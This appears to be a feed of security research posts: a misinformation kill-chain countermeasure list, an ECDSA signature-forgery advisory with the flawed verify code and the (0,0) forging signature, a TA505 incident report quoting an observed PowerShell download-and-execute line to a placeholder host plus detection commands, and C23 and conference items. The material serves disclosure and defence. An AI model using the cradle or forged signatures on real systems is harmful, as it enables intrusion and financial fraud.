The use of the Cyber Kill Chain allows us to not only consider the actions of attackers in the context of information security, but to also consider appropriate defensive actions (both operational and technical). In this section, we will elaborate on the defensive actions that can be taken against various stages in the Misinformation Kill Chain. 

In keeping with the well-known information security concepts of layered defense [17] and defense in depth [18], the countermeasures should support and reinforce each other so that, for example, if an attacker is able to bypass technical controls in order to deploy an attack, then staff should step up to respond appropriately and follow an incident response procedure. 

The increasing concern about misinformation on social media has resulted in studies by governments in several countries [19], which provide suggestions for combatting the issue, and indications of which countermeasures have been effective [20][21][22]. Some of the measures are applicable at multiple stages of the kill chain. For example, the labelling of misinformation is intended to make a user less likely to read it, less likely to share it and less likely to believe it. 

The following countermeasures can be applied at different stages of the kill chain, to help stem the propagation of misinformation and to limit its effectiveness: 

Step 1: Reconnaissance 

  1. Limiting the availability of useful metadata, tracking/logging of site visits, reduce the data that is visible without login in order to limit information gathering, about both individuals as well as aggregate populations of individuals.
  2. Limiting group interaction for non-members in order to restrict anonymous or non-auditable reconnaissance.
  3. Implementing effective user verification during account creation to prevent fake accounts.
  4. Educating users about spoofing attacks and encourage them to keep their profiles private and accept requests cautiously.

Step 2: Weaponization 

  1. Using effective misinformation screeners to block users from creating and posting ads, images, videos or posts with misinformation.
  2. Labelling misinformation or grading it according to reliability (based on effective identification), in order to allow users to make a more informed decision on what they read. 
  3. Removing misinformation (based on effective identification) to prevent it from reaching its target. 

Step 3: Delivery 

  1. Recognition or identification (followed by either removal or marking) of misinformation using machine learning (ML), human observation or a combination of both.
  2. Recognition or identification (followed by either removal or suspension) of hostile actors using machine learning (ML), human observation or a combination of both. 
  3. Identification and removal of bots, especially when used for hostile purposes.

Step 4: Exploitation 

  1. Public naming of hostile actors in order to limit acceptance of their posts and raise awareness of their motivations and credibility.
  2. Encouraging members of the medical field to combat the large volumes misinformation with equally large volumes of valid and thoroughly vetted information about the safety and effectiveness of, in this case, the COVID-19 vaccines [22].
  3. Analyzing and improving the effectiveness of the misinformation prevention measures on social media platforms.
  4. Demanding and obtaining transparency and strong messaging from government organizations.

Step 5: Installation 

  1. Labelling misinformation or grading it according to reliability (based on effective identification).
  2. Tracking and removing misinformation (based on effective identification) in order to control its spread.

Step 6: Command and Control 

  1. Removal of groups or users with a record of repeatedly posting misinformation.
  2. Suspending accounts to influence better behavior, in the case of minor transgressions.

Step 7: Actions on Objectives 

  1. Media Literacy education – this is not a short-term measure but has been reported as very effective in Scandinavia [22] and is proposed as a countermeasure by the US DHS [20] to increase the resilience of the public to misinformation on social media by teaching them how to identify fake news stories and differentiate between facts and opinions.
  2. Fact checking – a wider presence of easily accessible sources for the general public and for journalists may assist in wider recognition of misinformation and help to form a general habit of checking against a reliable source.
  3. Pro-vaccine messaging on social media – encourage immunizations on social media emphasizing immediate and personalized benefits of taking the vaccines, rather than long-term protective or societal benefits since studies in health communications have shown the former approach to be much more effective than the latter [24]. Studies have also shown that using visual means than textual can magnify those benefits [25].

In Part 2 of this blog post series: Risk Analysis of Vaccine Misinformation Attacks

Since social media is an integral part of people’s lives and is often a primary source of information and news for many users, it is safe to assume that it influences the vaccination rates and vaccine hesitancy among its users. This in turn affects the ability of the population to achieve herd immunity and increases the number of people who are more likely to die from COVID-19. Several studies have been conducted recently attempting to understand and quantitatively measure the effects of vaccine misinformation on vaccination rates. Each of these studies used different approaches and metrics across different social media platforms to perform the analysis, but they all conclude the same thing in the end – misinformation lowers intent to accept a COVID-19 vaccine. In our next post in this series, we will look at the results of these studies in more detail and use them to perform a risk analysis of misinformation attacks.

References:

[1] https://marvelous.ai/wp-content/uploads/2019/06/WWW19COMPANION-165.pdf

[2] https://en.wikipedia.org/wiki/Kill_chain

[3] https://www.lockheedmartin.com/content/dam/lockheed-martin/rms/documents/cyber/LM-White-Paper-Intel-Driven-Defense.pdf

[4] https://www.nytimes.com/2021/08/05/us/politics/covid-vaccines-russian-disinformation.html

[5] https://fortune.com/2021/07/23/russian-disinformation-campaigns-are-trying-to-sow-distrust-of-covid-vaccines-study-finds/

[6] https://www.npr.org/2021/05/13/996570855/disinformation-dozen-test-facebooks-twitters-ability-to-curb-vaccine-hoaxes

[7] https://www.forbes.com/sites/brucelee/2021/05/09/as-covid-19-vaccine-microchip-conspiracy-theories-spread-here-are-some-responses/?sh=65408061602d

[8] https://www.factcheck.org/2021/07/scicheck-spoof-video-furthers-microchip-conspiracy-theory/

[9] https://about.fb.com/news/tag/misinformation/

[10] https://help.twitter.com/en/rules-and-policies/medical-misinformation-policy

[11] https://www.reddit.com/r/redditsecurity/comments/pfyqqn/covid_denialism_and_policy_clarifications/

[12] https://newsroom.tiktok.com/en-us/combating-misinformation-and-election-interference-on-tiktok

[13] https://www.scientificamerican.com/article/information-overload-helps-fake-news-spread-and-social-media-knows-it/

[14] https://www.consumerreports.org/social-media/facebook-approved-ads-with-coronavirus-misinformation/

[15] https://docs.cdn.yougov.com/w2zmwpzsq0/econTabReport.pdf

[16] https://www.insider.com/20-of-americans-believe-microchips-in-covid-19-vaccines-yougov-2021-7

[17] https://www.ibm.com/docs/en/i/7.3?topic=security-layered-defense-approach

[18] http://www.nsa.gov/ia/_files/support/defenseindepth.pdf

[19] https://www.poynter.org/ifcn/anti-misinformation-actions/

[20] https://www.dhs.gov/sites/default/files/publications/ia/ia_combatting-targeted-disinformation-campaigns.pdf

[21] https://www.digitalmarketplace.service.gov.uk/g-cloud/services/101266738436022

[22] https://www.chathamhouse.org/2019/10/eu-us-cooperation-tackling-disinformation

[23] Hernandez RG, Hagen L, Walker K, O’Leary H, Lengacher C. The COVID-19 vaccine social media infodemic: healthcare providers’ missed dose in addressing misinformation and vaccine hesitancy. Hum Vaccin Immunother. 2021 Sep 2;17(9):2962-2964. doi: 10.1080/21645515.2021.1912551. Epub 2021 Apr 23. PMID: 33890838; PMCID: PMC8381841.

[24] https://msutoday.msu.edu/news/2021/ask-the-expert-social-medias-impact-on-vaccine-hesitancy

[25] https://www.pixelo.net/visuals-vs-text-content-format-better/

✇ NCC Group Research

Technical Advisory – Arbitrary Signature Forgery in Stark Bank ECDSA Libraries (CVE-2021-43572, CVE-2021-43570, CVE-2021-43569, CVE-2021-43568, CVE-2021-43571)

By: Paul Bottinelli
Vendor: Stark Bank's open-source ECDSA cryptography libraries
Vendor URL: https://starkbank.com/, https://github.com/starkbank/ 
Versions affected:
- ecdsa-python (https://github.com/starkbank/ecdsa-python) v2.0.0
- ecdsa-java (https://github.com/starkbank/ecdsa-java) v1.0.0
- ecdsa-dotnet (https://github.com/starkbank/ecdsa-dotnet) v1.3.1
- ecdsa-elixir (https://github.com/starkbank/ecdsa-elixir) v1.0.0
- ecdsa-node (https://github.com/starkbank/ecdsa-node) v1.1.2
Author: Paul Bottinelli [email protected]
Advisory URLs:
 - ecdsa-python: https://github.com/starkbank/ecdsa-python/releases/tag/v2.0.1
 - ecdsa-java: https://github.com/starkbank/ecdsa-java/releases/tag/v1.0.1
 - ecdsa-dotnet: https://github.com/starkbank/ecdsa-dotnet/releases/tag/v1.3.2
 - ecdsa-elixir: https://github.com/starkbank/ecdsa-elixir/releases/tag/v1.0.1
 - ecdsa-node: https://github.com/starkbank/ecdsa-node/releases/tag/v1.1.3
CVE Identifiers:
 - ecdsa-python: CVE-2021-43572
 - ecdsa-java: CVE-2021-43570 
 - ecdsa-dotnet: CVE-2021-43569 
 - ecdsa-elixir: CVE-2021-43568 
 - ecdsa-node: CVE-2021-43571 
Risk: Critical (universal signature forgery for arbitrary messages)

Summary

Stark Bank is a financial technology company that provides services to simplify and automate digital banking, by providing APIs to perform operations such as payments and transfers. In addition, Stark Bank maintains a number of cryptographic libraries to perform cryptographic signing and verification. These popular libraries are meant to be used to integrate with the Stark Bank ecosystem, but are also accessible on popular package manager platforms in order to be used by other projects. The node package manager reports around 16k weekly downloads for the ecdsa-node implementation while the Python implementation boasts over 7.3M downloads in the last 90 days on PyPI. A number of these libraries suffer from a vulnerability in the signature verification functions, allowing attackers to forge signatures for arbitrary messages which successfully verify with any public key.

Impact

An attacker can forge signatures on arbitrary messages that will verify for any public key. This may allow attackers to authenticate as any user within the Stark Bank platform, and bypass signature verification needed to perform operations on the platform, such as send payments and transfer funds. Additionally, the ability for attackers to forge signatures may impact other users and projects using these libraries in different and unforeseen ways.

Details

The (slightly simplified) ECDSA verification of a signature (r, s) on a hashed message z with public key Q and curve order n works as follows:

  • Check that r and s are integers in the [1, n-1] range, return Invalid if not.
  • Compute u_1 = zs^{-1} \mod n and u_2 = rs^{-1} \mod n.
  • Compute the elliptic curve point (x, y) = u_1 G + u_2 Q , return Invalid if (x, y) is the point at infinity.
  • Return Valid if r \equiv x \mod n, Invalid otherwise.

The ECDSA signature verification functions in the libraries listed above fail to perform the first check, ensuring that the r and s components of the signatures are in the correct range. Specifically, the libraries are not checking that the components of the signature are non-zero, which is an important check mandated by the standard, see X9.62:2005, Section 7.4.1/a:

1. If r’ is not an integer in the interval [1, n-1], then reject the signature.
2. If s’ is not an integer in the interval [1, n-1], then reject the signature.

For example, consider the following excerpt of the verify function from the ecdsa-python implementation.

def verify(cls, message, signature, publicKey, hashfunc=sha256):
    byteMessage = hashfunc(toBytes(message)).digest()
    numberMessage = numberFromByteString(byteMessage)
    curve = publicKey.curve
    r = signature.r
    s = signature.s
    inv = Math.inv(s, curve.N)
    u1 = Math.multiply(curve.G, n=(numberMessage * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
    u2 = Math.multiply(publicKey.point, n=(r * inv) % curve.N, N=curve.N, A=curve.A, P=curve.P)
    add = Math.add(u1, u2, A=curve.A, P=curve.P)
    modX = add.x % curve.N
    return r == modX

In that code snippet, the values r and s are extracted from the signature without any range check. An attacker supplying a signature equal to (r, s) = (0, 0) will not see their signature rejected. Proceeding with the verification, this function computes the inverse of the s component. Note that the Math.inv() function returns zero when supplied with a zero input (even though 0 does not admit an inverse). The code then computes the values u1 = inv * numberMessage * G and u2 = inv * r * Q, but since inv is zero, u1 and u2 will both be zero, i.e., the point at infinity, regardless of the value of numberMessage (the message hash, which we called z above) and Q (the public key). Subsequently, the implementation computes the intermediary curve point add by adding up the two previously computed points, which again results in the point at infinity. The final line checks that the r-component of the signature is equal to the x-coordinate of the curve point, essentially checking that 0 == 0 for all any message and any public key. Therefore, a signature (r, s) = (0, 0) is deemed valid by the code for any message, and under any public key.

Recommendation

Users of the different Stark Bank ECDSA libraries should update to the latest versions. Specifically, versions larger or at least equal to the following should be used.

  • ecdsa-python: v2.0.1
  • ecdsa-java: v1.0.1
  • ecdsa-dotnet: v1.3.2
  • ecdsa-elixir v1.0.1
  • ecdsa-node v1.1.3

Vendor Communication

2021-11-04 – NCC Group reported the vulnerability to Stark Bank developers.
2021-11-04 – Stark Bank acknowledged the issue and started fixing all vulnerable libraries.
2021-11-05 – Stark Bank confirmed that all vulnerable libraries were fixed.
2021-11-08 – Advisory published.

Thanks to

The support team at Stark Bank for their prompt acknowledgement and response, and Jennifer Fernick, Aaron Haymore, Kevin Henry, Marie-Sarah Lacharité, Thomas Pornin, Giacomo Pope and Javed Samuel at NCC Group for their support and careful review during the disclosure process.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 2021-11-08

Written by:  Paul Bottinelli

✇ NCC Group Research

TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

By: RIFT: Research and Intelligence Fusion Team

NCC Group’s global Cyber Incident Response Team has observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor. TA505 is a known cybercrime threat actor, who is known for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the section below on checks for potential compromise.

Execution

We observed that Base64 encoded PowerShell commands were logged shortly after the Serv-U exceptions indicating exploitation. The PowerShell commands ultimately led to deployment of a Cobalt Strike Beacon on the system running the vulnerable Serv-U software.

The PowerShell command observed deploying Cobalt Strike was:

powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('hxxp://IP:PORT/a'))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled task named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly backup the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP-servers in your network and checking these logs for traces of similar exceptions as suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds describe follow-up activity regarding a completely different threat actor than we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of the vulnerability. The first indicator of compromise for the exploitation of this vulnerability are suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder. Looking at this log file it contains exceptions at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.

Check for RegIdleBackup task abuse

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content:

# Check for altered RegIdleBackup task
Export-ScheduledTask -TaskName "RegIdleBackup" -TaskPath "\Microsoft\Windows\Registry\" | Select-String -NotMatch "{CA767AA8-9157-4604-B64B-40747123D5F2}"

# Check for suspicious CLSID registry key content
Get-ChildItem -Path 'HKLM:\SOFTWARE\Classes\CLSID{SUSPICIOUS_CLSID}'

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

  • Check if your Serv-U version is vulnerable
  • Locate the Serv-U’s DebugSocketlog.txt
  • Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
  • Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
  • Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
    • In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
  • If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021 after Microsoft published about the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Amount Country
1141 China
549 United States
99 Canada
92 Russia
88 Hong Kong
81 Germany
65 Austria
61 France
57 Italy
50 Taiwan
36 Sweden
31 Spain
30 Vietnam
29 Netherlands
28 South Korea
27 United Kingdom
26 India
21 Ukraine
18 Brazil
17 Denmark

Top vulnerable versions identified:

Amount Version
441 SSH-2.0-Serv-U_15.1.6.25
236 SSH-2.0-Serv-U_15.0.0.0
222 SSH-2.0-Serv-U_15.0.1.20
179 SSH-2.0-Serv-U_15.1.5.10
175 SSH-2.0-Serv-U_14.0.1.0
143 SSH-2.0-Serv-U_15.1.3.3
138 SSH-2.0-Serv-U_15.1.7.162
102 SSH-2.0-Serv-U_15.1.1.108
88 SSH-2.0-Serv-U_15.1.0.480
85 SSH-2.0-Serv-U_15.1.2.189

MITRE ATT&CK mapping

Tactic Technique Procedure
Initial Access T1190 – Exploit Public Facing Application(s) TA505 exploited CVE-2021-35211 to gain remote code execution.
Execution T1059.001 – Command and Scripting Interpreter: PowerShell TA505 used Base64 encoded PowerShell commands to download and run Cobalt Strike Beacons on target systems.
Persistence T1053.005 – Scheduled Task/Job: Scheduled Task TA505 hijacked a scheduled task named RegIdleBackup and abused the COM handler associated with it to execute malicious code and gain persistence.
Defense Evasion T1112 – Modify Registry TA505 altered the registry so that the RegIdleBackup scheduled task executed the FlawedGrace RAT loader, which was stored as Base64 encoded strings in the registry.

References

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211
[2] https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211
[3] https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

✇ NCC Group Research

Public Report – Zcash NU5 Cryptography Review

By: Jennifer Fernick

In March 2021, Electric Coin Co. engaged NCC Group to perform a review of the upcoming network protocol upgrade NU5 to the Zcash protocol (codenamed “Orchard”). The review was to be performed over multiple phases: first, the specification document changes and the relevant ZIPs, then, in June 2021, the implementation itself. 

The Public Report for this review may be downloaded below:

✇ NCC Group Research

The Next C Language Standard (C23)

By: Robert C. Seacord

by Robert C. Seacord

The cutoff for new feature proposals for the next C Language Standard (C23) has come and gone meaning that we know some of the things that will be in the next standard and all of the things that will not be. There are still a bunch of papers that have been submitted but not yet adopted into C23. Some of these papers will be accepted, some will be rejected, and potentially some good ideas won’t make it because of lack of time to perfect them and gain consensus. NCC Group has already had a number of proposals accepted into C23. This blog posts reviews an additional five papers that we have submitted which are currently under consideration.

Santa Claus disguised as the author

Clarifying integer terms v2

During a committee discussion of the behavior of calloc, it became clear that the committee lacks a consensus definition of terms such as “overflow” and “wraparound” that are commonly used to discuss integer arithmetic. As a result, the committee can’t answer the simple question “do unsigned numbers overflow?”.

This paper [N2837] is unlikely to change the behavior of the language. However, having taught Secure Coding in C and C++ for 16 years I can tell you it is extremely important that we have a common shared vocabulary to discuss language behaviors; especially behaviors like overflow and wraparound that commonly result in exploitable vulnerabilites.

Identifier Syntax using Unicode Standard Annex 31

Unicode® Standard Annex #31 Unicode Identifier and Pattern Syntax [Davis 2009] describes specifications for recommended defaults for the use of Unicode in the definitions of identifiers and in pattern-based syntax and has been adopted by has been adopted by C++, Rust, Python, and other languages. By adopting the recommendations of UAX #31, C will be easier to work with in international environments and less prone to accidental problems. This paper [N2836] also aligns the C language with other current languages that defer to Unicode UAX #31 for identifier syntax.

calloc Wraparound Handling

RUS-CERT [RUS-CERT 2002, Weimer 2002] documented the defect in calloc implementations and similar routines:

Integer overflow can occur during the computation of the memory region size by calloc and similar functions. As a result, the function returns a buffer which is too small, possibly resulting in a subsequent buffer overflow.

While most implementations were repaired, the standard was not updated to clarify the existing requirement.

The problem subsequently reoccurred [MSRC 2021]. The same vulnerability exists in standard memory allocation functions spanning widely used real-time operating systems (RTOS), embedded software development kits (SDKs), and C standard library (libc) implementations. This paper [N2810] clarifies the existing behavior of calloc in the event that nmemb * size wraps around, to help prevent future implementation defects resulting in security vulnerabilities.

Annex K Repairs

Annex K Bounds-checking interfaces provides alternative library functions that promote safer, more secure programming. Annex K contains the *_s functions verify that output buffers are large enough for the intended result and return a failure indicator if they are not. Annex K’s set_constraint_handler_s function is specified to set the global process-wide runtime-constraint handler and return a pointer to the previously registered process-wide handler. However, because the process-wide handler is shared among all threads in a program, it is not well-suited for multithreaded programs where code runs in separate threads. This paper [N2809] proposes two alternative solutions for using constraint handlers in multithreaded programs.

Volatile C++ Compatibility

The volatile keyword imposes restrictions on access and caching and is often necessary for memory that can be externally modified. Some uses of the volatile keyword are ambiguous, incorrect, or insecure. Consequently, C++ has deprecated many of these uses[P1152R4]. This paper [N2743] proposed deprecating these same uses of the volatile keyword in C for the same reasons, and to maintain compatibility with C++.

References

[Davis 2009] Mark Davis. Unicode Standard Annex #31 Unicode Identifier and Pattern Syntax. September, 2009. URL: http://www.unicode.org/reports/tr31/tr31-11.html

[MSRC 2021] MSRC Team. “BadAlloc” – Memory allocation vulnerabilities could affect wide range of IoT and OT devices in industrial, medical, and enterprise networks. April 29, 2021. URL: https://msrcblog.microsoft.com/2021/04/29/badalloc-memory-allocation-vulnerabilities-could-affect-widerange-of-iot-and-ot-devices-in-industrial-medical-and-enterprise-networks/

[N2743] Robert C. Seacord. Volatile C++ Compatibility. May, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2743.pdf

[N2809] Robert C. Seacord. Annex K Repairs. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2809.pdf

[N2810] Robert C. Seacord. calloc wraparound handling. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2810.pdf

[N2836] Robert C. Seacord. Identifier Syntax using Unicode Standard Annex 31. October, 2021. URL: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2836.pdf

[N2837] Robert C. Seacord, Clarifying integer terms v2. October, 2021. URL:
http://www.open-std.org/jtc1/sc22/wg14/www/docs/n2837.pdf

[P1152R4] JF Bastien. Deprecating volatile. 19 July 2019. URL: http://wg21.link/P1152R4

[RUS-CERT 2002] RUS-CERT Advisory. Flaw in calloc and similar routines 2002-08:02. URL:
https://web.archive.org/web/20081225201357/http://cert.uni-stuttgart.de/advisories/calloc.php

[Weimer 2002] Florian Weimer. RUS-CERT Advisory 2002-08:02: Flaw in calloc and similar routines. August, 2002. URL: https://www.opennet.ru/base/cert/1028651886_905.txt.html


✇ NCC Group Research

Conference Talks – November 2021

By: Aaron Haymore

This month, members of NCC Group will be presenting their work at the following conferences:

  • Jennifer Fernick & David Wheeler (Linux Foundation), “Keynote: Securing Open Source Software”, to be presented at The Linux Foundation Member Summit (November 2-4 2021)
  • Brian Hong, “Sleight of ARM: Demystifying Intel Houdini”, to be presented at Ekoparty (November 2-6 2021)
  • Sanne Maasakkers, “Phish like an APT: Phenomenal pretexting for persuasive phishing”, to be presented at Ekoparty (November 2-6 2021)
  • Frans van Dorsselaer, “Symposium on Post-Quantum Cryptography: Act now, not later”, to be presented at the CWI Symposium on Post-Quantum Cryptography (November 3 2021)
  • Pepjin Hack & Zong-Yu Wu, “We Wait, Because We Know You – Inside the Ransomware Negotiation Economics”, to be presented at Black Hat Europe 2021 (November 8-11 2021)
  • Philip Marsden, “The 5G threat landscape”, to be presented at Control Systems Cybersecurity Europe 2021 (November 9-10 2021)
  • Pepjin Hack (NCC Group), Kelly Jackson Higgins (Dark Reading, & Rik Turner (Omdia), “Dark Reading panel: Ransomware as the New Normal”, to be presented at Black Hat Europe (Business Hall) (November 10 2021)
  • Alex Plaskett, “Pwning the Windows 10 Kernel with NTFS and WNF”, to be presented at Power of Community 2021 (November 11-12 2021) 
  • Tennisha Martin, “Keynote: The Hacker’s Guide to Mentorship: Fostering the Diverse Workforce of the Future”, to be presented at SANS Pentest HackFest (November 15-16 2021)
  • Jennifer Fernick, “Financial Post-Quantum Cryptography in Production: A CISO’s Guide”, to be presented at FS-ISAC (Nov 30 2021)

Please join us!


Keynote: Securing Open Source Software
Jennifer Fernick (NCC Group) & David Wheeler (Linux Foundation)
The Linux Foundation Member Summit
November 2-4 2021


Sleight of ARM: Demystifying Intel Houdini
Brian Hong

Ekoparty
November 2-6 2021

In the recent years, we have seen some of the major players in the industry switch from x86-based processors to ARM processors. Most notable is Apple, who has supported the transition to ARM from x86 with a binary translator, Rosetta 2, which has recently gotten the attention of many researchers and reverse engineers. However, you might be surprised to know that Intel has their own binary translator, Houdini, which runs ARM binaries on x86.

In this talk, we will discuss Intel’s proprietary Houdini translator, which is primarily used by Android on x86 platforms, such as higher-end Chromebooks and desktop Android emulators. We will start with a high-level discussion of how Houdini works and is loaded into processes. We will then dive into the low-level internals of the Houdini engine and memory model, including several security weaknesses it introduces into processes using it. Lastly, we will discuss methods to escape the Houdini environment, execute arbitrary ARM and x86, and write Houdini-targeted malware that bypasses existing platform analysis.

Phish like an APT: Phenomenal pretexting for persuasive phishing
Sanne Maasakkers 

Ekoparty
November 2-6 2021


Symposium on Post-Quantum Cryptography: Act now, not later
Frans van Dorsselaer 

CWI Symposium on Post-Quantum Cryptography
November 3 2021

The Symposium Post-Quantum Cryptography is part of a series organized by CWI Cryptology Group and TNO. The first symposium in April 2021 was a general introduction to the problem from the perspective of industry, government, and end user. In this second episode we zoom in on a number of specific topics, including quantum-safe PKI, the relation between PQC and QKD, and PQC standards & implementation. The symposium is aimed at higher management and security professionals from government, private sector, and industry.

Cryptography is at the heart of internet security. However, much of the currently deployed cryptography is vulnerable to quantum attacks, which will become effective once large-scale quantum computers become feasible. Therefore, the affected cryptographic standards must be replaced by ones that offer security against quantum attacks. The post-quantum cryptography transition may take organizations ten years to complete, or longer. To remain secure and comply with legal and regulatory requirements, affected organizations should act now. What do you need to know – and what can you do – in order to continue your course of business securely?

“We Wait, Because We Know You” – Inside the Ransomware Negotiation Economics
Pepjin Hack & Zong-Yu Wu

Black Hat Europe 2021
November 8-11 2021

Organizations worldwide continue to face waves of digital extortion in the form of targeted ransomware. Digital extortion is therefore now classified as the most prominent form of cybercrime and the most devastating and pervasive threat to functioning IT environments. Currently, research on targeted ransomware activity primarily looks at how these attacks are carried out from a technical perspective. Little research has however focused on the economics behind digital extortions and digital extortion negotiation strategies using empirical methods.

This session explores three main topics. First, can we explain how adversaries use economic models to maximize their profits? Second, what does this tell us about the position of the victim during the negotiation phase? And third, what strategies can ransomware victims leverage to even the playing field? To answer these questions, over seven hundred attacker-victim negotiations, between 2019 and 2020, were collected and bundled into a dataset. This dataset was subsequently analyzed using both quantitative and qualitative methods.

Analysis of the final ransom agreement reveals that adversaries already know how much victims will pay, even before the negotiations have started. Each ransomware gang has created its own negotiation and pricing strategies meant to maximize its profits. We however provide multiple strategies which can be used by victims to obtain a more favorable outcome. These strategies are taken from negotiation failures and successes derived from the cases we have analyzed and are accompanied by examples and quotes from actual conversations.

When ransomware hits a company, they find themselves in the middle of an unknown situation. One thing that makes those more manageable is to have as much information as possible. We aim to provide victims with some practical tips they can use when they find themselves in the middle of that crisis.

The 5G threat landscape
Philip Marsden

Control Systems Cybersecurity Europe 2021
November 9-10 2021

While the move to 5G mobile deployments presents a wealth of opportunities and capabilities for us all, the technology also introduces new vulnerabilities and threats. There are three main threat vectors across the various 5G domains and within these are sub-threats that describe additional points of vulnerability for threat actors to exploit. While not all inclusive, these types of threats have the potential to increase risk to a particular mobile operator as they transitions to 5G. The Policy and Standards, securing the Supply Chain and finally the 5G systems architecture itself all have various vulnerabilities associated with them and are the foundation for securing the 5G future infrastructure. These threats could be cascaded by attackers to further leverage access to your 5G network and compromise hosts or the endpoint user devices be it a IoT device, a handset or a connected vehicle. This overview will attempt to show these threats and specific issues that might pose a risk to IoT/Control system devices and highlight how to mitigate these. 

Dark Reading panel: Ransomware as the New Normal
Pepjin Hack (NCC Group), Kelly Jackson Higgins (Dark Reading), & Rik Turner (Omdia)

Black Hat Europe (Business Hall) 
November 10 2021

It’s the same story, different victim, over and over: a hospital, school system, or business (think Colonial Pipeline) gets hit with a ransomware attack that locks down their servers, their operations, and in the case of healthcare organizations, places their patients at physical risk. Even with increased awareness, known best practices, and now, the governments like the US putting the squeeze on attackers and their cryptocurrency cover, there’s still no real end in sight to ransomware.  

A panel of security experts will discuss and debate why ransomware attacks are so easy to pull off, why they’re so hard to stop – and what organizations need to do to double down on their defenses against one of these debilitating cyberattacks. 

Pwning the Windows 10 Kernel with NTFS and WNF
Alex Plaskett

Power of Community 2021
November 11-12 2021

A local privilege escalation vulnerability (CVE-2021-31956) 0day was identified as being exploited in the wild by Kaspersky. At the time it affected a broad range of Windows versions (right up to the latest and greatest of Windows 10).
With no access to the exploit or details of how it worked other than a vulnerability summary the following plan was enacted:

  1. Understand how exploitable the issue was in the presence of features such as the Windows 10 Kernel Heap-Backed Pool (Segment Heap).
  2. Determine how the Windows Notification Framework (WNF) could be used to enable novel exploit primitives.
  3. Understand the challenges an attacker faces with modern kernel pool exploitation and what factors are in play to reduce reliability and hinder exploitation.
  4. Gain insight from this exploit which could be used to enable detection and response by defenders.

